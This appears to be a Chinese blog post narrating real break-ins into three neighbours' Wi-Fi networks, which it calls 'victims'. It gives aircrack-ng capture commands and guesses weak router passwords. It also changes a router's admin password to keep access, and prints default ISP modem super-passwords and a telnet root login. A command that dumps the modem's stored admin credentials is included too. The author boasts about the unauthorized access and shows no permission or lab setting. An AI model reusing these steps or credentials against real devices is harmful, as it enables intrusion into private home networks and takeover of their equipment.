背景:四川某城乡结合部,实战wifi

受害者1号

wifi扫描

喜闻乐见aircrack-ng

准备

1
2
3
4
5
6
7
8
9
10
11
12
13
14

root@joe1sn:~/wifi# airmon-ng check kill

Killing these processes:

PID Name
844 wpa_supplicant

root@joe1sn:~/wifi# airmon-ng start wlan0


PHY Interface Driver Chipset

phy0 wlan0mon rtl8xxxu Realtek Semiconductor Corp. RTL8192EU 802.11b/g/n WLAN Adapter

准备.png

网卡.png`

开始监听

1
root@joe1sn:~/wifi# airodump-ng wlan0mon

probe瞬间抓上了连接的包

但是原理是啥?

抓包成功.png

连接测试

输密码直接成功

路由器控制

windows上直接看到网关

1
2
3
4
5
6
7
无线局域网适配器 WLAN 3:

连接特定的 DNS 后缀 . . . . . . . : DHCP HOST
本地链接 IPv6 地址. . . . . . . . : fe80::.........
IPv4 地址 . . . . . . . . . . . . : 192.168.0.102
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 192.168.0.1

进入网关

tp-link.png

猜测弱密码>

多次尝试,得到路由器管理密码> 123456

修改密码> LS2xxxxxxx0cu来保持访问

进入tplink.png

网络账号后台(光猫)

发现还有一个后台

http://192.168.1.1/

移动后台.png

各种猜测帐号+弱口令无效后,下面一段小字引起注意

提示:参见设备底部 "默认配置账户/密码

然后就去百度,相关搜索神助攻

超级密码.png

账号:CMCCAdmin

密码:aDm8H%MdA

登陆成功

移动后台2.png

最后基本想干啥就干啥了,弱密码无敌!

受害者2号

咋们换个新鲜玩法

用wifi万能钥匙连上

万能钥匙.jpg

手机usb分享网络,在电脑上进入192.168.0.1

或者 连上后使用二维码分享

分享码.jpg

然后再扫描该二维码

qr.jpg

得到密码> xxxxxxxx

telnet进光猫

依旧使用超级密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
C:\Users\Desktop
λ telnet 192.168.1.1
F412
Login: root
Password: Zte521(输入的时候是不显示的)

BusyBox v1.01 (2015.12.21-19:30+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ # help

Built-in commands:
-------------------
. : break cd chdir continue eval exec exit export false hash
help local pwd read readonly return set shift times trap true
type ulimit umask unset wait [ ash awk brctl busybox cat chmod
chrt cmp cp cut date df echo egrep free fuser getty grep hexdump
hostname ifconfig init insmod kill killall linuxrc ln login ls
lsmod mkdir mknod mount mv passwd ping ping6 ps pwd reboot rm
rmdir rmmod sed sh sleep taskset test tftp top traceroute umount
wget

/ # sendcmd 1 DB p DevAuthInfo
<Tbl name="DevAuthInfo" RowCount="6">
<Row No="0">
<DM name="ViewName" val="IGD.AU1"/>
<DM name="Enable" val="1"/>
<DM name="IsOnline" val="0"/>
<DM name="AppID" val="1"/>
<DM name="User" val="telecomadmin"/>
<DM name="Pass" val="xxxxxx"/>
<DM name="Level" val="1"/>
<DM name="Extra" val=""/>
<DM name="ExtraInt" val="0"/>
</Row>
.........

得到光猫超级密码

 <DM name="User" val="telecomadmin"/> 
 <DM name="Pass" val="xxxxxx"/>

得到路由器账号–居然得不到!!!

然后这是个闲置的路由器,除了我没有发现其他设备,:-(

还是pwn没有学好

受害者3号

连上wifi

这个wifi使用玩跟那个要是拿到密码的,和受害者2差不多的方式拿到密码

进入路由器管理员

弱密码

user: admin

passwd: admin

网络账号后台(光猫)

账号:CMCCAdmin

密码:aDm8H%MdA

发现其他网络

其他网络.png

得到密码

得到密码.png

然后成功连上